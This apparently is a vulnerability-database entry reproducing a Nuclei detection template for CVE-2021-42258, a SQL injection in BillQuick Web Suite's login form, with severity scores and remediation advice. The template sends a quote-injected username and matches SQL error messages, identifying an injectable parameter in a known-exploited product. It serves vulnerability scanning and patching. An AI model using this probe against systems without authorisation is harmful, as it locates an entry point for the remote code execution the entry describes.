BillQuick Web Suite SQL Injection

2021-10-26 08:26:22
ProjectDiscovery
github.com
Tags: cve2021, sqli, billquick, kev, bqe, unauthenticated, remote code execution, security patches, compromise

CVSS2: 6.8
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.973
Percentile: 99.9%

BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.

id: CVE-2021-42258

info:
  name: BillQuick Web Suite SQL Injection
  author: dwisiswant0
  severity: critical
  description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite.
  reference:
    - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42258
    cwe-id: CWE-89
    epss-score: 0.9738
    epss-percentile: 0.99901
    cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: bqe
    product: billquick_web_suite
  tags: cve2021,cve,sqli,billquick,kev,bqe

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96

    matchers:
      - type: word
        part: body
        words:
          - "System.Data.SqlClient.SqlException"
          - "Incorrect syntax near"
          - "_ACCOUNTLOCKED"
        condition: and

    extractors:
      - type: xpath
        name: VS
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__VIEWSTATE']"
        attribute: value

      - type: xpath
        name: VSG
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
        attribute: value

      - type: xpath
        name: EV
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__EVENTVALIDATION']"
        attribute: value
# digest: 4b0a0048304602210096ac7613d8118a6e83fc200da64d198cab9837d8532d76dd435f8f6d394e1a81022100e38483a2a89a277b9d4f33ff80fb59c13e81b4610752b1e7fe0a74f6de84cc99:922c64590222798bb761d5b6d8e72950
